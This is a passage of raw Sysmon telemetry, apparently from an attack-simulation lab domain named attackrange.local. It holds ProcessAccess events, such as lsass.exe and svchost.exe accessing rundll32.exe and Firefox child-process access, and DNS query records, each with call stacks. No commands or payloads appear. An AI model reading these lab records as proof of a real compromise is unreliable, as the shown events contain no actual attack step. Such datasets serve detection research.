Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.317{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.317{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.270{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.270{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.504{59A5CD1D-945A-6005-3305-00000000A301}7052img-prod.pocket.prod.cloudops.mozgcp.net02600:1901:0:e988::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.481{59A5CD1D-945A-6005-3305-00000000A301}7052img-prod.pocket.prod.cloudops.mozgcp.net034.120.237.76;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.480{59A5CD1D-945A-6005-3305-00000000A301}7052img-getpocket.cdn.mozilla.net0type: 5 img-getpocket-cdn.prod.mozaws.net;type: 5 img-prod.pocket.prod.cloudops.mozgcp.net;::ffff:34.120.237.76;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.364{59A5CD1D-8E56-6005-2E00-00000000A301}2464192.252.41.52.in-addr.arpa.0type: 12 ec2-52-41-252-192.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.307{59A5CD1D-8E56-6005-2E00-00000000A301}246482.221.107.34.in-addr.arpa.0type: 12 82.221.107.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.288{59A5CD1D-8E56-6005-2E00-00000000A301}2464122.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-122.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.287{59A5CD1D-8E56-6005-2E00-00000000A301}2464221.5.120.34.in-addr.arpa.0type: 12 221.5.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.786{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000017172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.786{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.661{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.630{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.286{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.248{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.354{59A5CD1D-8E56-6005-2E00-00000000A301}246471.134.227.13.in-addr.arpa.0type: 12 server-13-227-134-71.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 10341000x800000000000000017182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 